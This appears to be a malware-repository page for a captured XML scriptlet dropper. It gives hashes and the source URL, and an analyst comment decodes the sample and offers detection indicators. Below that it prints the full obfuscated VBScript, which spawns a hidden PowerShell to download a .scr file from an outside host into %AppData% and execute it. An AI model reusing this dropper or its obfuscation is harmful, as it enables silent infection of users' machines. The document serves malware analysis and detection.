Sample details: dcd70f5a38469a0f207049d7b7bfbe1c

Hashes
MD5: dcd70f5a38469a0f207049d7b7bfbe1c
SHA1: 267cc2cc14eae0fc4ae065db0364c19883e673a5
SHA256: 23cb61f8dd74681f670d8c5ee6e9acd0f2b82425591faf64aecb2621722a5406
SSDEEP: 24:34UVwdTnVWJ9DHPHDOfoV6jJX8JQkT+9Y1vn5FUf+JJuRMLn:Ify9beV1MCkTT5F1uKL
Details
File Type: XML
Added: 2019-10-09 15:11:44
Yara Hits
Source
http://malev-bg.com/xmlInstall/regsec1
Strings
		<?xml version="1.0"?>
<package>
<!--
  Analyst annotation (not part of the captured sample).

  Structure: a script component document (package > component > script) whose
  script element declares VBScript and wraps it in a CDATA section. The
  component id and the VBScript variable names are random-looking strings,
  keyword casing is mixed, runs of spaces and tabs pad every token, and all
  statements are joined with ":" on one physical line. Exact-string or
  case-sensitive signatures will therefore miss it; match case-insensitively
  and normalise whitespace first.

  What the single script line does, in order:
    1. CreateObject on a name assembled from Chr/ChrW hex codes. The codes
       decode to "WSCrIPt.shElL" (the WScript.Shell automation object).
    2. Stores a PowerShell command line in a variable: poweRsheLL.EXE with
       -Ex ByPASS, -NOP and -w 1 (abbreviated -ExecutionPolicy, -NoProfile
       and -WindowStyle; 1 presumably maps to Hidden). Set-Content writes the
       bytes returned by Net.WebClient DownloadData for
       hxxp://malev-bg[.]com/xmlInstall/adkp.scr (-En BYtE) to
       %AppData%\df34RtujnSF45r.scr, and Invoke-Expression is then given that
       same path.
    3. Calls Run with: quote + ExpandEnvironmentStrings of a Chr-encoded
       "%cOmspEc%" + quote + quote + a ChrW-encoded "/C " + the stored
       command + quote, with 0 as the second argument (window style 0, no
       visible window). %AppData% is left for the command interpreter to
       expand.
    4. Sets the object variable to Nothing.

  Capture caveats: in this Strings rendering whitespace precedes the XML
  declaration and the CDATA section has no closing delimiter, so the listing
  is not well-formed as shown. This may be an extraction artefact; compare
  hashes against the original file bytes, not against this text.

  Detection and containment pointers grounded in the above:
    - Process lineage: a script host spawning the %ComSpec% interpreter with
      /C, which spawns powershell.exe carrying execution-policy bypass,
      no-profile and hidden-window switches.
    - PowerShell script block / command line logging: Net.WebClient with
      DownloadData followed by Set-Content with byte encoding and
      Invoke-Expression on a path under %AppData%.
    - File system: creation of a .scr file under %AppData% by powershell.exe.
    - Network: requests to the host named in the Source field and in the
      download URL (both under /xmlInstall/).
    - How the component gets loaded is not shown on this page. Remotely
      hosted documents of this shape are commonly loaded through
      regsvr32/scrobj.dll, so application-control rules for that path are
      worth checking (assumption, confirm against the delivery artefact).
-->
<component id="quefaRxllKFLeuWPZDcUHTAFwZRLYWHLWxgsgXMBRsiAtABlZDRZRT8625938468464115">
<script language="VBSCRIpt">
<![CDATA[
dim       BHYJrfddxtPG       :       diM       VeFIDLbxfGgc       :       SeT       BHYJrfddxtPG       =       cREAteObjeCt       (       Chr(&H57) & Chr(&H53) & Chr(&H43) & ChrW(&H72) & Chr(&H49) & Chr(&H50) & Chr(&H74) & ChrW(&H2E) & Chr(&H73) & ChrW(&H68) & ChrW(&H45) & Chr(&H6C) & Chr(&H4C)       )       :       VeFIDLbxfGgc       =       "			 		 		 	   poweRsheLL.EXE 	     	-Ex            ByPASS								 -NOP	        	-w            1							 set-CoNTenT			 	  	  	-vA	  	  ( 		NEw-ObjeCT			NEt.WeBcLIENT  	 			 ).doWNLoaDdatA( 					'http://malev-bg.com/xmlInstall/adkp.scr'  		 	     )	 	  	  -En											 BYtE 							-PaTH 	 '%ApPData%\df34RtujnSF45r.scr' 	 ;	         	inVOKE-exPReSSioN      '%aPPdaTA%\df34RtujnSF45r.scr'"       :       BHYJrfddxtPG.run       cHr       (       34       )       &       BHYJrfddxtPG.expANdeNvIRonmEnTStrIngS(       Chr(&H25) & Chr(&H63) & ChrW(&H4F) & Chr(&H6D) & ChrW(&H73) & Chr(&H70) & ChrW(&H45) & Chr(&H63) & ChrW(&H25)       )       &       cHR       (       34       )       &       chR       (       34       )       &       ChrW(&H2F) & ChrW(&H43) & ChrW(&H20)       &       VeFIDLbxfGgc       &       cHr       (       34       )       ,       0       :       SET       BHYJrfddxtPG       =       NoTHINg
</script>
<body>
</body>
</component>
</package>